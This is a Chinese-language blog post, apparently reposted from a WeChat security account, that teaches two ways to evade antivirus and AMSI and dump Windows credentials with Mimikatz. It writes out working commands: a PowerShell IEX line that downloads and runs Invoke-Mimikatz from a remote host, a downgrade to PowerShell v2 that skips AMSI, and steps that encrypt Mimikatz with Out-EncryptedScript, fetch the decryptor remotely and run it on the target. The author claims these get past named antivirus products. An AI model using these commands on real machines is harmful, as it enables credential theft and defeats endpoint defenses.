利用Powershell免杀抓密码姿势

  • A+
所属分类:安全文章

0x00 前言

今天给大家分享两个利用powershell来bypass杀软抓密码技巧,亲测目前不杀。


注:首发在了土司 https://www.t00ls.net/thread-62167-1-1.html


0x01 利用powershell v2绕过amsi抓密码

注:前提是win10机器需要.net3.0以上


当我们使用原始的powershell执行经典的抓密码发现,是被amsi阻止的

powershell -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.52.134:6688/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
利用Powershell免杀抓密码姿势


此时我们利用降维攻击,强制使用PowerShell v2绕过 amsi,因为版本2没有支持AMSI的必要内部挂钩

利用Powershell免杀抓密码姿势


可以看到成功绕过了amsi的检测执行成功mimikatz抓到了密码!.


0x02 使用Out-EncryptedScript加密抓密码

注:亲测目前可绕过某绒和某60

Out-EncryptedScript是Powersploit中提供工具的一种,他是用来进行加密处理的脚本,首先我们将Out-EncryptedScript.ps1与Invoke-Mimikatz.ps1放到同一目录下

利用Powershell免杀抓密码姿势


依次执行如下命令

powershell.exeImport-Module .Out-EncryptedScript.ps1Out-EncryptedScript -ScriptPath .Invoke-Mimikatz.ps1 -Password tubai -Salt 123456
利用Powershell免杀抓密码姿势


目录下便会自动生成evil.ps1文件,上传到目标机器即可

利用Powershell免杀抓密码姿势


在目标机器依次执行如下命令

powershell.exeIEX(New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Out-EncryptedScript.ps1")  注:由于https://raw.githubusercontent.com/不稳地,我本人是放在自己的阿里云上的。[String] $cmd = Get-Content .evil.ps1Invoke-Expression $cmd$decrypted = de tubai 123456Invoke-Expression $decryptedInvoke-Mimikatz
利用Powershell免杀抓密码姿势


如下,便成功绕过了杀软,成功的抓到了密码

利用Powershell免杀抓密码姿势

总结:

绕过AV的方式层出不穷,powershell在内网渗透方面利用的方式非常多,远远不止免杀与信息收集,希望大家能在授权的情况下,玩转自己的绕过思路,都能总结出自己的一些bypass小技巧!




关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,1120”安全参考等安全杂志PDF电子版,1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包还在等什么?赶紧点击下方名片关注学习吧!


推 荐 阅 读




利用Powershell免杀抓密码姿势
利用Powershell免杀抓密码姿势
利用Powershell免杀抓密码姿势

欢 迎 私 下 骚 扰



利用Powershell免杀抓密码姿势

本文始发于微信公众号(潇湘信安):利用Powershell免杀抓密码姿势

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: